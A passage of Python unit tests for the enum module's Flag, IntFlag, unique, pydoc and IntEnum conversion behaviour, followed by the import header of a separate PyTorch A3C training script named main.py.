self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.PURPLE), [Color.BLUE, Color.RED])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
name = "TestFlag.test_cascading_failure.<locals>.Bizarre"
self.assertRaisesRegex(ValueError, "5 is not a valid " + name, Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid " + name, Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid " + name, Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid " + name, Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid " + name, Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid " + name, Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
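# The race being probed: composite Flag members are created lazily on first
# lookup, so concurrent TestFlag(i) calls must converge on one canonical
# member per value. With identity-only __eq__, any duplicate object for the
# same value would inflate len(seen) past 256.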
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
X, W, R = Perm  # members iterate in definition order: X, W, R
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.PURPLE), [Color.BLUE, Color.RED])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexicographical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
if __name__ == '__main__':
unittest.main()
|
main.py
|
from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from network import ActorCriticFFNetwork
from test import test
from train import train
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import GAMMA
from constants import ENTROPY_BETA
from constants import GRAD_NORM_CLIP
from constants import TASK_LIST
from constants import ACTION_SIZE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
# Credit
# https://github.com/ikostrikov/pytorch-a3c
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
